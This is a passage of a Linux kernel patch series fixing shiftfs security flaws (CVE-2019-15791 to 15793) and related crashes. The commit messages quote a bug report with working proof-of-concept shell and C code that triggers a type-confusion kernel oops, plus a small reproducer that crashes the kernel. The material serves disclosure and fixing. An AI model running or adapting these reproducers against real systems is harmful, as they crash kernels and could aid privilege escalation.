+[ 183.538448] R13: 00007ffdf50bbfb0 R14: 0000000000000000 R15: 0000000000000000
+[ 183.540714] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm irqbypass snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core crct10dif_pclmul snd_hwdep crc32_pclmul ghash_clmulni_intel snd_pcm aesni_intel snd_seq_midi snd_seq_midi_event aes_x86_64 crypto_simd snd_rawmidi cryptd joydev input_leds snd_seq glue_helper qxl snd_seq_device snd_timer ttm drm_kms_helper drm snd fb_sys_fops syscopyarea sysfillrect sysimgblt serio_raw qemu_fw_cfg soundcore mac_hid sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid virtio_net net_failover psmouse ahci i2c_i801 libahci lpc_ich virtio_blk failover
+[ 183.560350] ---[ end trace 4a860910803657c2 ]---
+[ 183.561832] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
+[ 183.563496] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
+[ 183.569438] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
+[ 183.571102] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
+[ 183.573362] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
+[ 183.575655] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
+[ 183.577893] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
+[ 183.580166] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
+[ 183.582411] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
+[ 183.584960] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+[ 183.586796] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
+[ 183.589035] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+[ 183.591279] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+=======================================
+
+Disassembly of surrounding code:
+
+55 push rbp
+4889E5 mov rbp,rsp
+4157 push r15
+4156 push r14
+4155 push r13
+4154 push r12
+488B87C8000000 mov rax,[rdi+0xc8]
+4C8B6810 mov r13,[rax+0x10]
+498B4528 mov rax,[r13+0x28]
+4883786000 cmp qword [rax+0x60],byte +0x0 <-- GPF HERE
+0F8497000000 jz near 0xcc
+4989FC mov r12,rdi
+4989F6 mov r14,rsi
+
+This is an attempted dereference of 0x6b6b6b6b6b6b6b6b, which is POISON_FREE; I
+think this corresponds to the load of "realfile->f_op->mmap" in the source code.
+
+Reported-by: Jann Horn <jannh@google.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+
+CVE-2019-15791
+
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 35 +++++++++++++++++++++--------------
+ 1 file changed, 21 insertions(+), 14 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 0d6ce377b07c..9a6a7ad50b90 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1389,8 +1389,7 @@ static inline bool is_btrfs_snap_ioctl(int cmd)
+ 	return false;
+ }
+ 
+-static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
+-					  void __user *arg,
++static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg,
+ 					  struct btrfs_ioctl_vol_args *v1,
+ 					  struct btrfs_ioctl_vol_args_v2 *v2)
+ {
+@@ -1404,7 +1403,6 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
+ 	else
+ 		ret = copy_to_user(arg, v2, sizeof(*v2));
+ 
+-	fdput(lfd);
+ 	__close_fd(current->files, fd);
+ 	kfree(v1);
+ 	kfree(v2);
+@@ -1415,11 +1413,11 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
+ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 					  struct btrfs_ioctl_vol_args **b1,
+ 					  struct btrfs_ioctl_vol_args_v2 **b2,
+-					  struct fd *lfd,
+ 					  int *newfd)
+ {
+ 	int oldfd, ret;
+ 	struct fd src;
++	struct fd lfd = {};
+ 	struct btrfs_ioctl_vol_args *v1 = NULL;
+ 	struct btrfs_ioctl_vol_args_v2 *v2 = NULL;
+ 
+@@ -1444,18 +1442,28 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 	if (!src.file)
+ 		return -EINVAL;
+ 
+-	ret = shiftfs_real_fdget(src.file, lfd);
+-	fdput(src);
+-	if (ret)
++	ret = shiftfs_real_fdget(src.file, &lfd);
++	if (ret) {
++		fdput(src);
+ 		return ret;
++	}
++
++	/*
++	 * shiftfs_real_fdget() does not take a reference to lfd.file, so
++	 * take a reference here to offset the one which will be put by
++	 * __close_fd(), and make sure that reference is put on fdput(lfd).
++	 */
++	get_file(lfd.file);
++	lfd.flags |= FDPUT_FPUT;
++	fdput(src);
+ 
+-	*newfd = get_unused_fd_flags(lfd->file->f_flags);
++	*newfd = get_unused_fd_flags(lfd.file->f_flags);
+ 	if (*newfd < 0) {
+-		fdput(*lfd);
++		fdput(lfd);
+ 		return *newfd;
+ 	}
+ 
+-	fd_install(*newfd, lfd->file);
++	fd_install(*newfd, lfd.file);
+ 
+ 	if (cmd == BTRFS_IOC_SNAP_CREATE) {
+ 		v1->fd = *newfd;
+@@ -1468,7 +1476,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 	}
+ 
+ 	if (ret)
+-		shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
++		shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2);
+ 
+ 	return ret;
+ }
+@@ -1482,13 +1490,12 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
+ 	int newfd = -EBADF;
+ 	long err = 0, ret = 0;
+ 	void __user *argp = (void __user *)arg;
+-	struct fd btrfs_lfd = {};
+ 	struct super_block *sb = file->f_path.dentry->d_sb;
+ 	struct btrfs_ioctl_vol_args *btrfs_v1 = NULL;
+ 	struct btrfs_ioctl_vol_args_v2 *btrfs_v2 = NULL;
+ 
+ 	ret = shiftfs_btrfs_ioctl_fd_replace(cmd, argp, &btrfs_v1, &btrfs_v2,
+-					     &btrfs_lfd, &newfd);
++					     &newfd);
+ 	if (ret < 0)
+ 		return ret;
+ 
+@@ -1511,7 +1518,7 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
+ 	fdput(lowerfd);
+ 
+ out_restore:
+-	err = shiftfs_btrfs_ioctl_fd_restore(cmd, btrfs_lfd, newfd, argp,
++	err = shiftfs_btrfs_ioctl_fd_restore(cmd, newfd, argp,
+ 					     btrfs_v1, btrfs_v2);
+ 	if (!ret)
+ 		ret = err;
+-- 
+2.39.2
+
+From 187086d532fb6b5cb7785ebcb5438e170f136491 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Fri, 1 Nov 2019 14:19:16 +0100
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent type confusion
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1850867
+
+Verify filesystem type in shiftfs_real_fdget().
+
+Quoting Jann Horn:
+ #################### Bug 2: Type confusion ####################
+
+ shiftfs_btrfs_ioctl_fd_replace() calls fdget(oldfd), then without further checks
+ passes the resulting file* into shiftfs_real_fdget(), which does this:
+
+ static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
+ {
+  struct shiftfs_file_info *file_info = file->private_data;
+  struct file *realfile = file_info->realfile;
+
+  lowerfd->flags = 0;
+  lowerfd->file = realfile;
+
+  /* Did the flags change since open? */
+  if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
+   return shiftfs_change_flags(lowerfd->file, file->f_flags);
+
+  return 0;
+ }
+
+ file->private_data is a void* that points to a filesystem-dependent type; and
+ some filesystems even use it to store a type-cast number instead of a pointer.
+ The implicit cast to a "struct shiftfs_file_info *" can therefore be a bad cast.
+
+ As a PoC, here I'm causing a type confusion between struct shiftfs_file_info
+ (with ->realfile at offset 0x10) and struct mm_struct (with vmacache_seqnum at
+ offset 0x10), and I use that to cause a memory dereference somewhere around
+ 0x4242:
+
+ =======================================
+ user@ubuntu1910vm:~/shiftfs_confuse$ cat run.sh
+ #!/bin/sh
+ sync
+ unshare -mUr ./run2.sh
+ user@ubuntu1910vm:~/shiftfs_confuse$ cat run2.sh
+ #!/bin/sh
+ set -e
+
+ mkdir -p mnt/tmpfs
+ mkdir -p mnt/shiftfs
+ mount -t tmpfs none mnt/tmpfs
+ mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
+ mount|grep shift
+ gcc -o ioctl ioctl.c -Wall
+ ./ioctl
+ user@ubuntu1910vm:~/shiftfs_confuse$ cat ioctl.c
+ #include <sys/ioctl.h>
+ #include <fcntl.h>
+ #include <err.h>
+ #include <unistd.h>
+ #include <linux/btrfs.h>
+ #include <sys/mman.h>
+
+ int main(void) {
+   // make our vmacache sequence number something like 0x4242
+   for (int i=0; i<0x4242; i++) {
+     void *x = mmap((void*)0x100000000UL, 0x1000, PROT_READ,
+         MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
+     if (x == MAP_FAILED) err(1, "mmap vmacache seqnum");
+     munmap(x, 0x1000);
+   }
+
+   int root = open("mnt/shiftfs", O_RDONLY);
+   if (root == -1) err(1, "open shiftfs root");
+   int foofd = open("/proc/self/environ", O_RDONLY);
+   if (foofd == -1) err(1, "open foofd");
+   // trigger the confusion
+   struct btrfs_ioctl_vol_args iocarg = {
+     .fd = foofd
+   };
+   ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
+ }
+ user@ubuntu1910vm:~/shiftfs_confuse$ ./run.sh
+ none on /home/user/shiftfs_confuse/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
+ /home/user/shiftfs_confuse/mnt/tmpfs on /home/user/shiftfs_confuse/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
+ [ 348.103005] BUG: unable to handle page fault for address: 0000000000004289
+ [ 348.105060] #PF: supervisor read access in kernel mode
+ [ 348.106573] #PF: error_code(0x0000) - not-present page
+ [ 348.108102] PGD 0 P4D 0
+ [ 348.108871] Oops: 0000 [#1] SMP PTI
+ [ 348.109912] CPU: 6 PID: 2192 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
+ [ 348.112109] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
+ [ 348.114460] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs]
+ [ 348.116166] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75
+ [ 348.121578] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246
+ [ 348.123097] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249
+ [ 348.125174] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004
+ [ 348.127222] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150
+ [ 348.129288] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401
+ [ 348.131358] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004
+ [ 348.133421] FS: 00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000
+ [ 348.135753] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+ [ 348.137413] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0
+ [ 348.139451] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+ [ 348.141516] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+ [ 348.143545] Call Trace:
+ [ 348.144272] shiftfs_ioctl+0x65/0x76 [shiftfs]
+ [ 348.145562] do_vfs_ioctl+0x407/0x670
+ [ 348.146620] ? putname+0x4a/0x50
+ [ 348.147556] ksys_ioctl+0x67/0x90
+ [ 348.148514] __x64_sys_ioctl+0x1a/0x20
+ [ 348.149593] do_syscall_64+0x5a/0x130
+ [ 348.150658] entry_SYSCALL_64_after_hwframe+0x44/0xa9
+ [ 348.152108] RIP: 0033:0x7f77fa76767b
+ [ 348.153140] Code: 0f 1e fa 48 8b 05 15 28 0d 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d e5 27 0d 00 f7 d8 64 89 01 48
+ [ 348.158466] RSP: 002b:00007ffd875582e8 EFLAGS: 00000217 ORIG_RAX: 0000000000000010
+ [ 348.160610] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f77fa76767b
+ [ 348.162644] RDX: 00007ffd87558310 RSI: 0000000050009401 RDI: 0000000000000003
+ [ 348.164680] RBP: 00007ffd87559320 R08: 00000000ffffffff R09: 0000000000000000
+ [ 348.167456] R10: 0000000000000000 R11: 0000000000000217 R12: 0000561c135ee100
+ [ 348.169530] R13: 00007ffd87559400 R14: 0000000000000000 R15: 0000000000000000
+ [ 348.171573] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm snd_hda_codec_generic irqbypass ledtrig_audio crct10dif_pclmul crc32_pclmul snd_hda_intel snd_hda_codec ghash_clmulni_intel snd_hda_core snd_hwdep aesni_intel aes_x86_64 snd_pcm crypto_simd cryptd glue_helper snd_seq_midi joydev snd_seq_midi_event snd_rawmidi snd_seq input_leds snd_seq_device snd_timer serio_raw qxl snd ttm drm_kms_helper mac_hid soundcore drm fb_sys_fops syscopyarea sysfillrect qemu_fw_cfg sysimgblt sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid psmouse i2c_i801 ahci virtio_net lpc_ich libahci net_failover failover virtio_blk
+ [ 348.188617] CR2: 0000000000004289
+ [ 348.189586] ---[ end trace dad859a1db86d660 ]---
+ [ 348.190916] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs]
+ [ 348.193401] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75
+ [ 348.198713] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246
+ [ 348.200226] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249
+ [ 348.202257] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004
+ [ 348.204294] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150
+ [ 348.206324] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401
+ [ 348.208362] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004
+ [ 348.210395] FS: 00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000
+ [ 348.212710] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+ [ 348.214365] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0
+ [ 348.216409] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+ [ 348.218349] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+ Killed
+ user@ubuntu1910vm:~/shiftfs_confuse$
+
+Reported-by: Jann Horn <jannh@google.com>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+[ saf: use f_op->open instead as special inodes in shiftfs sbs
+  will not use shiftfs open f_ops ]
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+
+CVE-2019-15792
+
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 33 +++++++++++++++++++--------------
+ 1 file changed, 19 insertions(+), 14 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 9a6a7ad50b90..897e0163005e 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1087,20 +1087,6 @@ static int shiftfs_change_flags(struct file *file, unsigned int flags)
+ 	return 0;
+ }
+ 
+-static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
+-{
+-	struct file *realfile = file->private_data;
+-
+-	lowerfd->flags = 0;
+-	lowerfd->file = realfile;
+-
+-	/* Did the flags change since open? */
+-	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
+-		return shiftfs_change_flags(lowerfd->file, file->f_flags);
+-
+-	return 0;
+-}
+-
+ static int shiftfs_open(struct inode *inode, struct file *file)
+ {
+ 	struct file *realfile;
+@@ -1187,6 +1173,25 @@ static rwf_t shiftfs_iocb_to_rwf(struct kiocb *iocb)
+ 	return flags;
+ }
+ 
++static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
++{
++	struct file *realfile;
++
++	if (file->f_op->open != shiftfs_open &&
++	    file->f_op->open != shiftfs_dir_open)
++		return -EINVAL;
++
++	realfile = file->private_data;
++	lowerfd->flags = 0;
++	lowerfd->file = realfile;
++
++	/* Did the flags change since open? */
++	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
++		return shiftfs_change_flags(lowerfd->file, file->f_flags);
++
++	return 0;
++}
++
+ static ssize_t shiftfs_read_iter(struct kiocb *iocb, struct iov_iter *iter)
+ {
+ 	struct file *file = iocb->ki_filp;
+-- 
+2.39.2
+
+From 7bb96158915054edeee67b13212cd19b8fff54bd Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Fri, 1 Nov 2019 13:35:25 -0500
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: Correct id translation for lower fs
+ operations
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1850867
+
+Several locations which shift ids translate user/group ids before
+performing operations in the lower filesystem are translating
+them into init_user_ns, whereas they should be translated into
+the s_user_ns for the lower filesystem. This will result in using
+ids other than the intended ones in the lower fs, which will
+likely not map into the shifts s_user_ns.
+
+Change these sites to use shift_k[ug]id() to do a translation
+into the s_user_ns of the lower filesystem.
+
+Reported-by: Jann Horn <jannh@google.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+
+CVE-2019-15793
+
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 43 +++++++++++++++++++++++--------------------
+ 1 file changed, 23 insertions(+), 20 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 897e0163005e..04fba4689eb6 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -83,12 +83,27 @@ static inline void shiftfs_revert_object_creds(const struct cred *oldcred,
+ 	put_cred(newcred);
+ }
+ 
++static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to,
++			 kuid_t kuid)
++{
++	uid_t uid = from_kuid(from, kuid);
++	return make_kuid(to, uid);
++}
++
++static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to,
++			 kgid_t kgid)
++{
++	gid_t gid = from_kgid(from, kgid);
++	return make_kgid(to, gid);
++}
++
+ static int shiftfs_override_object_creds(const struct super_block *sb,
+ 					 const struct cred **oldcred,
+ 					 struct cred **newcred,
+ 					 struct dentry *dentry, umode_t mode,
+ 					 bool hardlink)
+ {
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
+ 	kuid_t fsuid = current_fsuid();
+ 	kgid_t fsgid = current_fsgid();
+ 
+@@ -100,8 +115,8 @@ static int shiftfs_override_object_creds(const struct super_block *sb,
+ 		return -ENOMEM;
+ 	}
+ 
+-	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
+-	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
++	(*newcred)->fsuid = shift_kuid(sb->s_user_ns, sbinfo->userns, fsuid);
++	(*newcred)->fsgid = shift_kgid(sb->s_user_ns, sbinfo->userns, fsgid);
+ 
+ 	if (!hardlink) {
+ 		int err = security_dentry_create_files_as(dentry, mode,
+@@ -117,20 +132,6 @@ static int shiftfs_override_object_creds(const struct super_block *sb,
+ 	return 0;
+ }
+ 
+-static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to,
+-			 kuid_t kuid)
+-{
+-	uid_t uid = from_kuid(from, kuid);
+-	return make_kuid(to, uid);
+-}
+-
+-static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to,
+-			 kgid_t kgid)
+-{
+-	gid_t gid = from_kgid(from, kgid);
+-	return make_kgid(to, gid);
+-}
+-
+ static void shiftfs_copyattr(struct inode *from, struct inode *to)
+ {
+ 	struct user_namespace *from_ns = from->i_sb->s_user_ns;
+@@ -758,6 +759,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 	struct iattr newattr;
+ 	const struct cred *oldcred;
+ 	struct super_block *sb = dentry->d_sb;
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
+ 	int err;
+ 
+ 	err = setattr_prepare(dentry, attr);
+@@ -765,8 +767,8 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 		return err;
+ 
+ 	newattr = *attr;
+-	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
+-	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
++	newattr.ia_uid = shift_kuid(sb->s_user_ns, sbinfo->userns, attr->ia_uid);
++	newattr.ia_gid = shift_kgid(sb->s_user_ns, sbinfo->userns, attr->ia_gid);
+ 
+ 	/*
+ 	 * mode change is for clearing setuid/setgid bits. Allow lower fs
+@@ -1356,6 +1358,7 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb,
+ 					const struct cred **oldcred,
+ 					struct cred **newcred)
+ {
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
+ 	kuid_t fsuid = current_fsuid();
+ 	kgid_t fsgid = current_fsgid();
+ 
+@@ -1367,8 +1370,8 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb,
+ 		return -ENOMEM;
+ 	}
+ 
+-	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
+-	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
++	(*newcred)->fsuid = shift_kuid(sb->s_user_ns, sbinfo->userns, fsuid);
++	(*newcred)->fsgid = shift_kgid(sb->s_user_ns, sbinfo->userns, fsgid);
+ 
+ 	/* clear all caps to prevent bypassing capable() checks */
+ 	cap_clear((*newcred)->cap_bset);
+-- 
+2.39.2
+
+From f140d37a80df29e1746b9ba9a29cf5b505c6a70f Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Fri, 17 Jan 2020 16:17:06 +0100
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent lower dentries from going
+ negative during unlink
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1860041
+
+All non-special files (For shiftfs this only includes fifos and - for
+this case - unix sockets - since we don't allow character and block
+devices to be created.) go through shiftfs_open() and have their dentry
+pinned through this codepath preventing it from going negative. But
+fifos don't use the shiftfs fops but rather use the pipefifo_fops which
+means they do not go through shiftfs_open() and thus don't have their
+dentry pinned that way. Thus, the lower dentries for such files can go
+negative on unlink causing segfaults. The following C program can be
+used to reproduce the crash:
+
+ #include <stdio.h>
+ #include <fcntl.h>
+ #include <unistd.h>
+ #include <sys/types.h>
+ #include <sys/stat.h>
+ #include <unistd.h>
+ #include <stdlib.h>
+
+ int main(int argc, char *argv[])
+ {
+        struct stat stat;
+
+        unlink("./bbb");
+
+        int ret = mknod("./bbb", S_IFIFO|0666, 0);
+        if (ret < 0)
+                exit(1);
+
+        int fd = open("./bbb", O_RDWR);
+        if (fd < 0)
+                exit(2);
+
+        if (unlink("./bbb"))
+                exit(4);
+
+        fstat(fd, &stat);
+
+        return 0;
+ }
+
+Similar to ecryptfs we need to dget() the lower dentry before calling
+vfs_unlink() on it and dput() it afterwards.
+
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Link: https://travis-ci.community/t/arm64-ppc64le-segfaults/6158/3
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 04fba4689eb6..3623d02b061e 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -583,6 +583,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+ 	int err;
+ 	const struct cred *oldcred;
+ 
++	dget(lowerd);
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+ 	inode_lock_nested(loweri, I_MUTEX_PARENT);
+ 	if (rmdir)
+@@ -602,6 +603,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+ 	inode_unlock(loweri);
+ 
+ 	shiftfs_copyattr(loweri, dir);
++	dput(lowerd);
+ 
+ 	return err;
+ }
+-- 
+2.39.2
+
+From c9d38b0997c70e60f89b31c83d1b7a1e375f28b1 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Fri, 10 Apr 2020 16:55:28 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: record correct creator credentials
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1872094
+
+When shiftfs is nested we failed to be able to create any files or
+access directories because we recorded the wrong creator credentials. We
+need to record the credentials of the creator of the lowers mark mount
+of shiftfs. Otherwise we aren't privileged wrt to the shiftfs layer in
+the nesting case. This is similar to how we always record the user
+namespace of the base filesystem.
+
+Suggested-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 17 +++++++++--------
+ 1 file changed, 9 insertions(+), 8 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 3623d02b061e..5c39529d0a17 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -2020,6 +2020,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 			 * parent mark mountpoint.
+ 			 */
+ 			sbinfo->passthrough_mark = sbinfo_mp->passthrough_mark;
++			sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
+ 		} else {
+ 			sbinfo->mnt = mntget(path.mnt);
+ 			dentry = dget(path.dentry);
+@@ -2028,16 +2029,16 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 			 * are identical.
+ 			 */
+ 			sbinfo->passthrough_mark = sbinfo->passthrough;
+-		}
+ 
+-		cred_tmp = prepare_creds();
+-		if (!cred_tmp) {
+-			err = -ENOMEM;
+-			goto out_put_path;
++			cred_tmp = prepare_creds();
++			if (!cred_tmp) {
++				err = -ENOMEM;
++				goto out_put_path;
++			}
++			/* Don't override disk quota limits or use reserved space. */
++			cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE);
++			sbinfo->creator_cred = cred_tmp;
+ 		}
+-		/* Don't override disk quota limits or use reserved space. */
+-		cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE);
+-		sbinfo->creator_cred = cred_tmp;
+ 	} else {
+ 		/*
+ 		 * This leg executes if we're admin capable in the namespace,
+-- 
+2.39.2
+
+From 485977eb4fb2701211275d28ca4fdbec87704a18 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Wed, 20 May 2020 13:44:27 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: let userns root destroy subvolumes
+ from other users
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
